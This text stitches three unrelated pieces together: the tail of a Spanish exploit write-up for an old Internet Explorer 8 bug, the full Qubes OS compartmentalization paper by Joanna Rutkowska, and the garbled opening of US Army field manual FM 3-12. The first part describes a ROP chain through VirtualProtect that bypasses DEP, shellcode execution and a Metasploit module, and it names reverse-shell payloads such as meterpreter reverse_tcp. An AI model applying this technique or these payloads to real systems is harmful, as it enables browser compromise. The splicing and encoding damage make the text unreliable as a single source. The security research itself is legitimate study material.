la MSDN nos dice:  
 

Fig.9 : API VirtualProtect según la MSDN.  
 
Básicamente nos está diciendo que mediante esta AP I podemos modificar una 
zona de memoria del espacio del proceso en cuestión, y situar el nivel de 
protección de acceso que queramos, es decir, modificar permisos de acceso 
sobre la memoria ( RWE:  Read/Write/Execute).  
 
Por tanto, y una vez he mos hecho el piv otado del stack:  
 

Fig.1 0: Primeros gadgets ROP.  
 
Se observa que además del gadget para pivotar el stack, se emplea otro primer 
gadget  para situar previamente EAX al valor deseado, aprovechando a su vez 
el control sobre el registro ESI que ofrece esta vulnerabilidad.  
 
A continuación, d evolvemos al inicio de VirtualProtect, con los argumentos 
anteriormente descritos:  
 

Fig.1 1: Salto de la protección DEP.  
 
Y finalmente ejecutamos la shellcode:  
 
 
Fig.1 2: Restauración de ESP y ejecución de nuestra shellcode.  
 

No obstante, después de ejecutar varias veces el exploit, me di cuenta de que 
no era tan fiable (reliable)  como el exploit  simple sin DEP . Esto es debido al 
stack pivot, puesto que cuando ejecutamos nuestra shellcode ESP continúa 
apuntando al heap y produce el error de la shellcode. Solucionamos esta 
cuestión restaurando el stack pointer  (ESP) , para ello antes de ejecutar la 
shellcode hacemos : mov esp, ebp  # Nop # Nop. Tal y c omo se aprecia en la 
imagen anterior . Bueno realmente esto no es una restauración sino más bien 
un parche, puesto que una restauración pasaría por almacenar previamente su 
valor (ESP) y cargarlo después ( mediante ROP gadgets), compensando 
también EBP para restaurar completamente el stack frame. Aunque esto ya 
sería hablar de controlar el crash de post -explotación y eso da ría para otro 
post. 
 
Y con esto tendríamos terminado el exploit.  
 
Hay ocasiones en las que no produce el crash en el primer intento, y por eso se 
ha incluido una recarga cada 5 segundos, para reintentarlo de nuevo:  
 
 
Fig.1 3: Recarga de la página en caso de error.  
 
 
Esto también se podría haber realizado mediante una ca becera refresh o 
empleando un meta tag sin ningú n problema.  
 
Comentar que todo esto ha sido probado bajo una máquina virtual con 
Windows XP SP3 (completamente actualizado hasta Junio de 2013), por lo que 
existirán algunas dependencias, sobre todo en los ga dgets empleados para la 
cadena ROP (aunque esos offsets se pueden reajustar). No obstante no debe 
existir problema para los 2 primeros POCs. De hecho puedo asegurar que un 
Windows XP SP3 (sin ninguna actualización) donde se descargue IE8 (también 
sin actua lizaciones), reproduce el bug sin problemas.  E incluso ejecuta la 
shellcode con DEP off.  
 
Esto lo comento porque antes de publicar este post  y posteriormente a su 
resolución  por Microsoft , envié toda la  info a metasploit pero no fue posible una 
reproducció n positiva  del bug por su parte. Y de hecho, yo también tengo 
alguna máquina virtual con updates de Julio o Agosto, donde el bug no 
funciona . Aún así, me gustaría agradecer d esde aquí a Juan Vázquez y Wei 
Chen  por su s intentos .  
 

No obstante, en los sistemas en los que se pueda emplear el módulo de msf, 
éstas serían algunas de las  payloads que no dan problemas y que he llegado a 
probar  con éxito : 
 
 windows/exec  
 windows/vncinject/reverse_tcp  
 windows/meterpreter/reverse_tcp  
 
Un ejempl o con la configuración por defecto:  
 
 
Fig.14 : Ejecución del módulo de metasploit.  
 
Aunque fue  contra una de las versiones viejas de este navegador , no deja de 
ser interesante   
 
Por último y no menos importante, un resumen d el material : 
 
 Este documento : Aquí. 
 Prueba de Concepto con control de EIP: Aquí. 
 Exploit con DEP deshabilita do: Aquí.  
 Exploit con DEP habilitado: Aquí. 
 Módulo para metasploit : Aquí. 
 Toda esta información comprimida (con pass: ysr -2013 -3845): Aquí. 
  
1/13 
 Software compartmentalization vs. p hysical separation  
(Or why Qubes OS is more than just a random collection of VMs) 
Joanna Rutkowska  
Invisible Things Lab  
August 2014  
 
Many people believe the Holy Grail of secure isolation is to use two or more physically separate 
machines. This belief seems so natural, that we often don't give it much thought. After all, what better 
isolation could we possible get than physical "airgap"?  
I would like to discuss two exemplary scenarios involving isolation: one for securing the Tor process  and 
another for secur ing email  operations , and compare the pros and cons of using the physical isolation vs. 
the software compartmentalization  as currently possible  on Qubes OS1. 
Securing Tor : the physical separation approach  
I'm sure most readers realize  the problem of hostin g the Tor process in the same operating system as 
the apps which  use it, specifically a web browser which has a very large attack surface:  in case of a 
successful attack against any of the apps , the Tor process also gets compromised easily, and this is 
pretty much the end of the game.  
Some people2 attempt to remedy this problem by using two physically separate computers – one to run 
Tor proxy and the other to run client apps. A sample configuration is depicted on the figure below  
(Figure 1), together with the most obvious attack vectors . 
The coloring3, which represents the level of difficulty  to attack certain entity, and so also its probability 
of being compromised when considering attacks originating from it , has been chosen quali tatively, 
based on my experience and intuition, as I’m not aware of any meaningful quantitative methods  to be 
used here . It makes most sense to consider them as relative measure of difficulty of attacks among the 
presented items, rather an absolute measure . 
The picture shows potential attacks on WiFi/eth drivers and stacks, including things such as DHCP client, 
coming both from the “external bad Internet”, which might be your local WiFi  or ADSL router , as well as 
from the client laptop, which might got comp romised because of the Web browser or other client app 
attack . We can draw, a  rather obvious, conclusion, that the security of the Tor process hosted on such 
physically separate gateway is no better than the security of all the networking stacks, including  drivers 
and programs such as DHCP , exposed by the gateway.  
Normally one would assume the security of the Tor gateway to be still much better than the security of 
the client laptop, because of the large attack  surface against a Web browser . However, we sho uld 
                                                           
1 https://wiki.qubes -os.org/   
2 See e.g. https://github.com/grugq/portal   
3 Unfortunately this paper is not fully compatible with B&W printers...  
2/13 
 realize that in some scenarios it might be the other way around, as in case of e.g. the user “being very 
careful”4 when browsing from the client laptop.  In that case the security of the laptop, which 
presumably now represents the most sensitive element s of the system (e.g. because it hosts important 
documents) suddenly is still no better than the security of Tor gateway, as the attack surface via the 
locally exposed networking code is surely no smaller.  
 
 
Figure 1 Securing Tor using separate machines . Colors illustrate attack surface size/difficulty  (see the legend box) . Arrows 
show potential attacks origins and their colors match that of the orignating entity color. The color of the whole machine is 
the color of the least secur e item hosted on it.  
Plus, as every laptop these days, it does expose a huge and way -to-simple -to-exploit attack surface 
associated with the USB device handling5. The potential attacks that might have compromised the 
laptop via USB devices (e.g. when the u ser decided to copy some documents to/from the laptop) might, 
of course , also try to attack the Tor gateway from the “other side”, as also illustrated on the diagram.  
All in all, the overall security of this seemingly well secured system seems to be surpri singly weak , in 
spite of physical separation used . 
                                                           
4 The phrase : “being careful when browsing” , is often pretty meaningless, but might be interpreted as e.g. using 
Firefox with all the scripting disabled, etc.  
5 For a survey of variou s USB attacks against desktop systems, see: 
http://theinvisiblethings.blogspot.com/2011/06/usb -security -challenges.html   

3/13 
 Securing Tor : software compartmenta lization approach (Qubes OS)  
Let’s now look at how the above problem – secure Tor usage – could be solved via fine -grained software 
compartmentalization aided by modern h ardware isolation technologies, specifically virtualization and 
IOMMU/VT -d. 
The picture below ( Figure 2) shows how this could be done on Qubes OS R2 , a flexible platform designed 
around the Security by Compartmentali zation princip le. Qube s OS R2 builds on top of Xen and uses 
lightweight Linux AppVMs and ServiceVMs6. 
 
Figure 2 Securing Tor on Qubes OS.  As in the previous picture , colors have been used to signalize  relative ease  of attacks on 
different compo nents. The discreet blocks encricled in dashed lines represent, this time, Qubes  VMs. The other elements of 
the system and their associated attack surfaces, such as the Xen hypervisor and select Dom0 services exposed to VMs, have 
not been shown, but it is assumed  they are not worse than “blue” (their secrity is discussed later in the text).  
                                                           
6 Qubes OS R2 also fully supports Windows 7 -based AppVMs, although they are not so lightweight as the Linux 
AppVMs. In fact this very article has been prepared in MS Office running on Windows 7 AppVM on Qubes OS.  

4/13 
 Qubes OS allows to isolate both the networking and USB stacks in unprivileged service VMs, a 
functionality made possible by the Xen hypervisor and IOMMU technology (call ed VT -d on Intel 
hardware), available on many laptops today.  
But mere creation of a networking VM (called “ NetVM ” for short in Qubes parlance7) or USB controllers -
hosting VM (called “ UsbVM ” in Qubes) hardly solves any problem automatically . This is because  we still 
would like to use networking, and, often,  also USB devices ... 
The real security benefit comes from the reduction of interfaces  that are possible in this software 
compartmentalization. Consider again the attacks coming from the local environment targeting WiFi 
drivers and stacks and  DHCP client. Wha t the attacker can gain from tho se attacks is to compromise the 
NetVM  at best8. It is tempting to think that the same attacks are now also possible against other VMs 
which connect to the NetVM . This , howev er, is not correct, because the amount of networking code 
exposed by other VMs is significantly smaller, compared to that which the NetVM  exposes to the 
outside world. We don’t need complex WiFi drivers and stacks in the VM, neither we need DHCP client 
there. This is because we operate now in a much simplified scenario, using Xen shared memory to 
exchange data instead of physical wires or rad io waves, w e control all the aspects of the system, so we 
don’t need protocols such as DHCP to configure “networking” . In fact we don’t need networking at all, 
yet, for backward compatibility, we need to use some Ethernet -like dummy drivers, which are 
represented by Xen front - and backend drivers in the pictur e above, as well as the  core  TCP/IP stack.  
We can easily imag ine eliminating virtually all the networking code from most of the AppVMs, and 
replacing it with simple inter -VM pipes  (such as those provided by qrexec  in Qubes OS ). That would 
require some modifications to the applications  (such as Split GPG discussed l ater) , or use of application -
level proxies, though.  
The benefit  of reduced netw orking interfaces also works to protect the user apps against potential 
attacks coming from the Tor VM, an important consideration in some scenarios as discussed in the 
previous  section. Furthermore Qubes agility in creation of multiple AppVMs makes it significantly easier 
to keep some of the AppVMs less expose d to attacks, something that is a topic of one of the next 
sections . 
                                                           
7 Qubes OS allows to create multiple NetVMs and ProxyVMs, see: 
http://theinvisiblethings.blogspot.com/2011/09/playing -with -qubes -networking -for-fun.html   
8 Some people find it disconcerting that the attacker, who compromised the NetVM, mi ght use it to perform all 
sorts of networking -oriented attacks, such as sniffing or various MITM attacks. That’s true, but remember all the 
same attacks are possible to be conducted from the local WiFi network, and should be addressed on the protocol 
level  (use of encryption).  
5/13 
 Handling of USB in Qubes OS  
Similarly to compartment alized networking, we can get various benefits also when we contain all the 
USB stacks in a UsbVM9. And this applies to the scenario of securing Tor just as well as to any other 
scenario on a desktop system (hence a distinct section ). 
The primary attack su rface, which includes potential bugs in the USB stacks parsing code or USB -device -
specific drivers, including various filesystem drivers or modules, can now be contained within a 
UsbVM10. Similarly as in the case of NetVM , the most benefit can be seen when we can expose the USB 
functionality from the UsbVM  over much simplified interfaces, than the USB device exposes to the OS.  In 
Qubes there are several ways of how to do that, but currently only for mass storage devices (aka USB 
disks).  
It is possible to exp ose block devices (aka disk volumes) using the Xen block backend  hosted in the 
UsbVM11. This way, all the USB -specific,  complex processing happens in isolated UsbVM  while the 
important outcome, the block device, is exposed  to the user AppVM, where it could be mounted just 
like a normal disk12. 
This approach still exposes the receiving VM for some hazard though. This is because the block device, 
which looks like a disk, does trigger some amount of parsing in the Linux kernel (or whatever other OS 
kernel that i s running there). Thus it is possible for the attacker (who e.g. compromised UsbVM , or just 
for the compromised USB device) to expose malformed partition table or LUKS -headers, hoping to 
exploit a hypothetical flaw in the kernel (in case disk encryption is n’t used, this could also include 
malformed filesystem metadata and, of course, malicious files – even more significant attack surface).  
Additionally, similarly as in case of the networking, there is also some possibility for an exploitable bug in 
the bloc k front end . To further protect against such attacks, it is possible to use Qubes security -
optimized inter -VM file copy operation  (see qvm -copy -to-vm command ). This, combined with a file -
hosted encryption containers, takes volume metadata processing code o ut of TCB.  
Speaking of USB, we shall note Qubes also has special support for making system -wide backups with 
ability to store them on a USB disk (or some Network Attached Storage, or somewhere in the Cloud) 
without the need to trust any USB or volume parsi ng code, and without requiring  to mount any USB 
disks in Dom0.  This is a subject for another article, though.  
                                                           
9 Qubes installer does not create UsbVM by default (as it does for NetVM), yet the user is able to create it with a 
few clicks in Qubes Manager. It is also recommended in Qubes documentation. In the next release we will likely 
add def ault UsbVM creation to the installer also.  
10 It is possible to have as many UsbVMs as there are USB controllers in the system.  
11 Qubes supports this via handy qvm -block  command, as well as clickable UX in Qubes Manager. It is even possible 
to start an AppV M and make it boot directly from a block device hosted in another VM (e.g. downloaded ISO).  
12 It could be also “piped” through something like LUKS or TrueCrypt in order to keep the UsbVM from learning the 
content.  
6/13 
 As of now there is limited support for dealing with classes of USB devices other than mass storage13. This 
means that if  one would like to use e.g.  USB-based camera with one of the AppVMs (e.g. for Skype), the 
whole USB controller  (i.e. a distinct PCIe device) would have to be assigned to that VM. While this offers 
good isolation  (USB bus is inherently insecure, so isolating on USB controller level  is much better), t he 
convenience and usefulness of this approach depends on how many physical USB controllers there are 
in a given laptop and how are the devices inter -connected to them. In future Qubes releases, better 
support for USB virtualization, shou ld offer much more elasticity and convenience here . 
It is important to point out that there is a class of USB devices which is so security sensitive, that it 
makes little sense to delegate its handling to a UsbVM . It is the keyboard and mous e. These device s 
convey the user will to the system, and so if they could be hijacked, then all is lost anyway14. Luckily 
majority of laptops today do not use USB -based  keyboards or touchpads15. 
Securing email operations  
Software compartmentalization can show benefits com pared to physical isolation  not only  in de-
privileging networking or USB stacks. Let ’s now consider another scenario – securing of email -centric 
work environment . 
Primitive “airgap” or “security by virtualization” solutions often attempt to enforce a way t oo simplistic 
threat model on the user by enforcing military -style “top -secret/classified/unclassified” or simple 
“work/personal” dual persona models. But typical user workflows are in practice much more complex, 
often involving many more security domains than just two, and typically without any kind of simple 
relation of trust between them16. 
The next picture ( Figure 3) shows a few Qubes AppVMs involved in securing of my daily work -related 
workflow. The work -email is the central Ap pVM for me, because today my work mostly revolves around 
communication with various people via email. Many of the emails I deal with are GPG -encrypted.  
However, I don’t keep my private keys in the work -email AppVM, because I still consider it relatively 
vulnerable as the Thunderbird attack surface seems quite large if we consider all the networking code 
used to interact with my untrusted  email server17, as well as all the email headers processing, not to 
mention parsing of the message contents (which, thank fully can often be opted out).  
 
                                                           
13 Qubes already has infrastructure to supp ort USB virtualization (see qvm -usb) yet the Xen PVUSB backend is still 
not very usable.  
14 In future releases of Qubes, especially commercial spin -offs, this might not be entirely true, because we plan on 
separating the user vs. admin roles by introduction  of GUI vs. Admin domain separation.  
15 Apple laptops being a notable exception here.  
16 Which security domain should be considered more sensitive: work or personal? And how about banking?  
17 It is healthy to always consider external servers to be potentially  compromised. This includes a possibility that 
any 3rd party server might be usually trivially compromised by the internal personnel, aka admins.  
7/13 
  
Figure 3 Securing email -centric work environment in Qubes OS. Arrows show allowed executions of Qubes RPC services 
(qrexec). They are controlled by a centralized policy in Dom0.  
In order to protec t my private keys, I use Qubes Split GPG application18, which acts similarly to a smart 
card, yet offers some additional benefits. First, it doesn’t require USB to be part of the TCB. Second, it 
offers more control over access to the keys, something that a smart card does not, as once it is plugged 
in, and the PIN got sniffed, the malware can use the private keys at will, without the user every noticing 
anything suspicious.  
My work -email VM is also configured to automatically open URLs (from email messag es I receive) in my 
work -web VM. This is trivially configurable in Qubes by telling TB to use ‘qvm -open -in-vm work -web’ 
command as a web browser. Additionally, Qubes default firewall takes care of ensuring that my work -
email  VM can only establish networking co nnection to my email server and nothing more19. 
                                                           
18 See: https://wiki.qubes -os.org/wiki/UserDoc/Spl itGpg   
19 A word of caution about treating Qubes firewall as an anti -leak prevention mechanism. It has not been intended 
to act like so, and generally anti -leak prevention is mostly impractical. The firewall is intended mainly as a way to 
prevent user mist akes (e.g. accidentally opening Firefox in email AppVM), non -intentionally -malicious application 
misconfigurations (open firewall to allow listening on some port), or as a convenient place to reliably log traffic 
to/from select VMs.  

8/13 
 I also have a dedicated AppVM, this one exceptionally based on Windows 7, which I use  to work on 
various trusted documents (e.g. preparing slides, writing reports, etc) . I can directly encrypt or decrypt 
from within this VM, again using Qubes Split GPG. This way I can keep my work -email domain from 
learning the conte nt of these sensitive documents  when I send them over email.  I can also directly open 
a document, which I receive via email from not -so-trusted so urce, in a Disposable VM with just two 
click s. This way I don’t need to risk potential compromise of my email, yet I can also provide adequate 
protection to the document itself by opening it in an isolated AppVM instead of in the all -purpose yet 
not-so-trusted work -web  VM, something especially important when dealing with NDA -protected 
documents. I can also use Qubes trusted PDF converter in other to “upgrade” a document and save it 
into my regular work AppVM20. 
Of course I can easily combine the advanced net working and USB handling as discussed earlier in this 
text with any or all of my AppVMs. E.g. I can easily attach some of the AppVMs through a Tor or VPN 
proxy service VM.  
 
Figure 4 Email clients do crash... (courtesy of @bleidl  for the Tails ticket, rest is from the author's home collection)  
It should be obvious that this sort of fine -grained decomposition of user tasks is not possible, or 
extremely difficult  and costly  to implement using physically separate machines. What might  not be so 
evident is that Qubes also allows for this fine -grained compartmentalization to be almost unnoticeable 
to the user. This is achieved thanks to Qubes seamless desktop integration, automatic memory 
balancing, and additional mechanisms that could b e used to automate the mundane tasks of 
remembering what should be done in which AppVM, such as automatic URL opening in pre -defined 
                                                           
20 See: http://theinvisiblethings.blogspot.com/2013/02/converting -untrusted -pdfs -into-trusted.html   

9/13 
 AppVM or Disposable VM. Dealing with documents speared among different AppVM is, in fact, not 
significantly more inconvenie nt than dealing with multiple folders or disks on a traditional desktop 
system21. 
In order to further ease the management of many VMs, Qubes provides support for sharing root 
filesystems between AppVMs in a read -only manner22. Thanks to this, not only we can  save huge 
amount of disk space, as there is no need to duplicate the root filesystem across all the VMs , but it is 
also possible to update software in all the VMs all at once. This is supported both for Linux -based 
AppVMs (Fedora, Debian, and Archlinux -based), as well as for Windows -based ones.  
Some people even consider this as an extra security feature – namely if an AppVM get s restarted, its 
root filesystem is returned automatically back to the template’s “golden image” state. However, one 
should be care ful here, as the VM -compromising code might very well be triggered from within the user 
home directory, which, naturally, is preserved across VM reboots (except for Disposable VMs).  One 
advantage of the non -persistent rootfs though, is that the malware is still inactive before the user's 
filesystem gets mounted and "processed" by system/applications, which might theoretically allow for 
some scanning programs (or a skilled user) to reliably scan for signs of infections of the AppVM. But, of 
course, the probl em of finding malware hooks in general is hard, so this would work likely only for some 
special cases (e.g. an AppVM which doesn't use Firefox, as otherwise it would be hard to scan the Firefox 
profile directory reliably to find malware hooks there). Also note that the user filesystem's metadata 
might got maliciously modified by malware in order to exploit a hypothetical bug in the AppVM kernel 
whenever it mounts the malformed filesystem. However, these exploits will automatically stop working 
(and so the i nfection might be cleared automatically) after the hypothetical bug got patched and the 
update applied (via Template VM update , so reliably ), which is still a much desired security feature . 
Securing Twitter Account  
Twitter accounts become increasingly lucr ative target for criminals these days, with some studies 
presenting them as even more attractive for attackers than credit card numbers23. One would think that 
the best method to secure one ’s twitter account might be to have a dedicated AppVM24 for this... But  
that’s not quite the best strategy...  
Most people seem to be using Twitter Web Client  (TWC) , i.e. twitter.com  website , because it is 
convenient, simple and powerful. In fact it is too powerful . TWC tries to be both the daily user tweet 
reader, as well as the ultimate administrator tool for one’s tweeter account. Unlike for 3rd party apps, 
which can be easily revoked access from within TWC interface  (see Figure 5), the compromise of the 
                                                           
21 Admittedly one important functionality that is lost is system -wide docume nt search. It is, however, thinkable to 
write Qubes app offering such service spanning multiple domains. It would require some thought, though to do it 
right. Sooner or later we will likely introduce it in Qubes R3, probably together with a unified File Ma nager for all 
the user files.  
22 See: https://wiki.qubes -os.org/wiki/TemplateImplementation   
23 See e.g.: http://www.businessinsider.com/why -hackers -want -your -twitter -account -2014 -
8?utm_source=rand_social&utm_medium=hootsuite_rand&utm_campaign=hootsuite_rand_social   
24 As follows from the earlier discussions, a Qubes AppVM should be safer than a dedicated physical laptop for 
twitter, because of all the networking and USB stacks that could be easily sandboxed on Qubes OS.  
10/13 
 Web browser (where the TWC lives) might be much  harder for the user to recover fro m. Using TWC for 
daily tweeting is similar to using root or Administrator account for daily desktop computing . It should be 
obvious the regular T witter use exposes one to a huge attack surface : all those pictures, videos and 
exciting links one is offered to click are  just a n accident waiting to happen.  
Thus a more reasonable way to approach this problem is to use a Twitter app (not necessarily in a 
dedicated AppVM, even) for all every day tweeting, while keeping the Twitte r Web Client, together with 
its passw ord, in a dedicated AppVM (see twitter -admin  VM on Figure 3). Of course one should be careful 
not to use it for regular tweeting . It would be helpful if Twitter considered offering split Web in terface, 
securable with separate passphrases/keys: one for daily tweeting, and the other for administrating of 
the account, with ability to easily revoke access of the former from the latter . 
 
Figure 5 It would be convenient if Tw itter could split its pop ular Web Client into a normal “t weeting app” (with access 
revocable like for all other Twitter clients) and an admin interface (which would not be a Tweet client at the same time). 
TweetDeck, that I use, does not implement some of the features that Twitter Web Client provides (actually it “implements” 
these features, such as showing the list of followers, by delegating them to TWC).  
The described approach to securing of Twitter account doesn’t really take advantage of any special 
features of Qubes OS, other than the cheapness and agility with creation of dedicated AppVMs (in this 
case: twitter -admin ), something that wouldn’t be so convenient if one wanted to use a separate 
machine for this task25.  
Weaknesses of software isolation  
Everything written so far has been silently ignoring the potential problem of attacks “against 
virtualization layer” . Let’s discuss tho se now and let’s start by categorizing potential attacks against  
virtualization according to what layer they might be target ing. 
We thus could imagine attacks against:  
                                                           
25 It is very likely that such separate machine would  be reused also for different purposes than only as Twitter 
administration, thus decreasing the overall security. E.g. if this separate machine was also used to keep GPG 
private keys, then using it also for accessing of twitter.com would suddenly become a security problem.  
11/13 
 1. The actual virtualization technology, such as VT -x and VT -d, 
2. The hypervisor (e.g. Xen),  
3. All the additional  software used by a virtualization system (e.g. qemu, DirectX emulation, etc).  
The attacks against the co re processor technology  (the 1st group) , such as VT -x, VT -d, or the good, old 
traditional CPU MMU/ring isolation, are considered extremely  difficult. In fact no attack has ever been 
presented against MMU or VT -x on Intel (or corresponding technology on AMD ) processors ever26. One 
attack against Intel VT -d, presented by us in 201127, was only possible because Intel released systems 
with half -baked functionality (i.e. without Interrupt Remapping units).  
Attacks against the core virtualization software,  (the 2nd group)  i.e. a baremetal hypervisor, are 
considered very  difficult. I believe the difficulty here is comparable to, or better than, attacks against 
core TCP/IP stack in Linux (core, so not considering all the additional stacks, like WiFi, or drivers).  
Finally, the last group mentioned above is where the low -hanging fruits can be found. In Qubes we took 
special precautions to limit this attack surface as much as possible (e.g. we don’t trust qemu, we have no 
networking in Dom0, we use security -optimized GUI virtualization, we have never used PyGRUB, etc). 
We’re not perfect, but we’re doing pretty well, I think28. 
The reader is now asked to quickly compare the above  attacks against those relevant in physically 
separate systems  scenarios  (Figure 1), remembering those systems must have networking and/or USB 
(or DVD at least) stacks and drivers to be useable for anything in practice, and that these must be part of 
the TCB.  Does it seem more likely to exploit a bug in CPU VMX or in Linux TCP/IP stack? Ethernet driver 
(or WiFi) or Xen? Qubes qrexec da emon or USB/DVD/filesystem processing code?  
Another area of concern for virtualization systems (i.e. other than privilege escalation attacks) is data 
leaks  between VMs . Here we can distinguish between two different kinds of leaks:  
1. Cooperative covert channe ls – i.e. when malware in two (already compromised) VMs conspire 
together in order to exchange data using unauthorized communication channel,  
2. Side channels (non -cooperative covert channels ) where malware in one VM tries to learn some 
facts about processes executing in other (non -compromised) VMs, e.g. in order to guess private 
key bits.  
It is important to stress how significantly d ifferent impacts on security tho se two potential attacks  
present . While first is mostly irrelevant for most work flows, the seco nd is fatal  in essentially any 
scenario.  
                                                           
26 In public, that is. But consider that essentially all other software got exploits presented in public.  
27 Following the White Rabbit: Software attacks against Intel(R) VT -d technology  
 (http://www.invisiblethingslab.com/resources/2011/Software%20Attacks%20on%20Intel%20VT -d.pdf ) 
28 The reader is encouraged to read Qubes Security Bulletins we have issued thus far: https://wiki.qubes -
os.org/wiki/SecurityBulletins   
12/13 
 The cooperative covert channels are possible through a variety of surprising means, such as CPU caches 
timings29. They often offer a very small bandwidth (o f the order of bits/s, sometime tens of bits/s) and 
are ofte n very unreliable (especially in a “noisy” desktop system like Qubes OS running a dozen or so of 
VMs all at the same time). It is generally considered that elimination of such cooperative covert 
channels is very difficult or impossible on COTS x86 har dware.  Usually  any attempts to mitigate those 
communication channels have negative impact on system performance. This is a popular topic among 
designers of systems used in military environments . 
Let’s make it clear that Xen, neither any other mainstream hyperv isor, I think, does not try to limit 
cooperative covert channels in any way.  In fact, it is likely that Xen, in addition to the platform -specific 
covert channels, also introduces a good deal of additional inter -VM cooperative channels, much more 
reliable and of  significantly higher bandwidth30. As noted above, because these are mostly irrelevant for 
most applications of Xen (and Qubes OS!), nobody has really cared to seriously review Xen in order to 
identify them and eliminate (something that hopefully might be possible with r elatively easy patching).  
Admittedly, in some specific use cases, such as the previously discussed Tor lockdown,  it might be 
desirable to limit the  cooperative covert channels t ough. E.g. we can imagine that both the AnonVM  
and NetVM  (refer again to Figure 2) got com promised and they could conspire now together in order to 
de-anonymize the user. But then, again, if we used physically separate Tor proxy (as in Figure 1) we are 
not free from this problem eit her – there are also many potentially covert channels between two 
network -connected (especially WiFi -connected) systems31! Nevertheless, we plan on looking more into 
this issue in future Qubes OS releases.  
Finally, let’s discuss the side -channels. There have b een many surprising side channels described in 
academic literature32, based on observation of seemingly unimportant details of execution environment , 
such as power consumption or EM leaks. There is no reason why similar attacks, should not be possible 
in virtualized environments, where observation of some of the effects of execution of other VMs is even 
easier measurable (e.g. CPU cache evictions or branch prediction).  Such attacks are almost exclusively 
targeted as crypto operations with a goal to extract ( at least some) bits of private keys.  
Most (all? ) proof of concept side -channel  attacks on virtualization systems, described in academic 
literature33, have been designed to be used against server  systems. This is often because in such 
scenarios the attacker has significantly higher control over the crypto operations that are targeted by 
the exploit – e.g. the attacker might be connecting to some SSL server, forcing it to conduct certain 
crypto operation over and over again, increasing the chances of the attac k to succeed. A desktop 
environment, such as this on Qubes OS, where the user might be invoking e.g. GPG 
                                                           
29 The academic literature on the topic is so vast that I won’t even attempt to provide any references here.  
30 See e.g. http://www.eicar.org/files/xencc -slides.pdf  (but likely there are more channels in Xen).  
31 Here Qubes OS might offer some advantage, thanks to separating the actual AnonVM(s) from NetVM via TorVM 
and FirewallVM, where each might be used to minim ize networking -based covert channels. This convenience is not 
available in a scenario discussed on Figure 1. 
32 See http://en.wikipedia.org/wiki/Side_channel_attack  as well as https://privatecore.com/resources -
overview/side -channel -attacks/  for a collection of references about attacks in virtualized environments.  
33 For reasons not entirely und erstood, the academics rarely publish any proof of concept code.  
13/13 
 encryption/decryption operations only a few times per day, is significantly more challenging . I thus 
personally don’t consider my GPG keys to be especially at risk from side channel attacks  from my other 
VMs , and I do worry more about other side-channels attacks much more (e.g. sniffing of my passphrase 
via EM -leak)34.  
It’s generally believed that the best protection against these attacks is via  careful implementation  of the 
crypto operation (e.g. ensure each loop iteration takes the same amount of time, regardless of the value 
of the n -th bit of the key).  
In any case, it is a mistake to think that side -channel attacks on crypto could be avoided by using 
separate machines35. 
Bottom line  
We have seen how the use of smart software compartmentalization (aided with IOMMU) could allow 
mitigating lots of security problems that otherwise are very hard to address properly.  
Let’s look again how that magic h ave happened: large interfaces have been reduced to much smaller 
ones, something that was possible because of the simplified environment we operate in (within one 
physical system, rather than on different systems, so no n eed for more complex communication 
protocols), plus we used unique hardware isolation technology, namely IOMMU/VT -d. Additionally, 
software compartmentalization allows for much cheaper and agile containers creation, w hich in turn 
allows for much more fine grained thread mitigation . 
Ultimatel y it's all about the complexity of the interfaces exposed between the hypervisor , VMs , and the 
outside world.  
Qubes OS that has been used as an illustration to our discussions is not a magic piece of software. In 
fact, it is a collection of extremely pragmatic pieces o f software. Yet the synergy of these  pragmatic  
building blocks, is quite powerful. 
                                                           
34 For people who still feel uneasy about the side-channel  attacks , Qubes offers a poor-man’s solution: to shut 
down, or pause, all the other VMs in Qubes for the time when the crypto operation is being performed.  
35 http://www.tau.ac.il/~tromer/acoustic/   FM 3-2
APRIL7
',675,%87,215(675,&7,21
$SSURYHGIRUSXEOLFUHOHDVHGLVWULEXWLRQLVXQOLPLWHG  
+($'48$57(56'(3$570(172)7+($50< 
683(5&(66,2167$7(0(177KLVSXEOLFDWLRQVXSHUVHGHV)0 38dated 12 February  4&<%(563$&(
 $1'(/(&7521,&  
:W$5)$5(23(5$7,216
FOREWORD 
Over the past decade of conflict, the U.S. Army has deployed the most capable communications systems in 
its history. U.S. forces dominated cyberspace and the electromagnetic spectrum (EMS) in Afghanistan and 
Iraq against enemies and adversaries lacking the technical capabilities to challenge our superiority in 
cyberspace. However, regional peers have since demonstrated impressive capabilities in a hybrid operational 
environment that threaten the Army’s dominance in cyberspace and the EMS.  
The Department of Defense information network-Army (DODIN-A) is an essential warfighting platform 
foundational to the success of all unified land operations. Effectively operating, securing, and defending this 
network and associated data is essential to the success of commanders at all echelons. We must anticipate 
that future enemies and adversaries will persistently attempt to infiltrate, exploit, and degrade access to our 
networks and data. A commander who loses the ability to access mission command systems, or whose 
operational data is compromised, risks the loss of lives and critical resources, or mission failure. In the future, 
as adversary and enemy capabilities grow, our ability to dominate cyberspace and the EMS will become more 
complex and critical to mission success.  
Incorporating cyberspace electromagnetic activities (CEMA) throughout all phases of an operation is key to 
obtaining and maintaining freedom of maneuver in cyberspace and the EMS while denying the same to 
enemies and adversaries. CEMA synchronizes capabilities across domains and warfighting functions and 
maximizes complementary effects in and through cyberspace and the EMS. Intelligence, signal, information 
operations (IO), cyberspace, space, and fires operations are critical to planning, synchronizing, and executing 
cyberspace and electronic warfare (EW) operations. CEMA optimizes cyberspace and EW effects when 
integrated throughout Army operations. 
FM 3-12 defines and describes the tactics to address future challenges while providing an overview of 
cyberspace and EW operations, planning, integration, and synchronization through CEMA. It describes how 
CEMA supports operations and the accomplishment of commander’s objectives, and identifie s the units that 
conduct these operations. Due to the rapidly evolving cyberspace domain, the Cyber COE will review and 
update FM 3-12 and supporting publications on a frequent basis in order to keep pace with a continuously 
evolving cyberspace domain. 
JOHN B. MORRISON JR.  
Major General, U. S. Army  
Commanding  
This publication is available at the Army Publishing 
Directorate site (http://www.apd.army.mil),
and the Central Army Registry site
 (https://atiam.train.army.mil/catalog/dashboard)
This page intentionally left blank.   
*FM 3 -12  
DISTRIBUTION  REST RICTION : Approved for public release; distribution is unlimited.  
This publication supersedes  FM 3 -38, dated  12 February  2014.  
11 April 2017  FM 3-12 i  
Field Manual  
No. 3-12 Headquarters  
Department of the Army  
Washington, DC , 11 April 2017  
CYBERSPACE AN D ELECTRONIC WARFARE 
OPERATIONS  
Contents  
Page  
CYBERSPACE AND ELECT RONIC WARFARE  OPERATIONS  ................................ ..........  I 
 PREFACE ................................ ................................ ................................ ....................  iv 
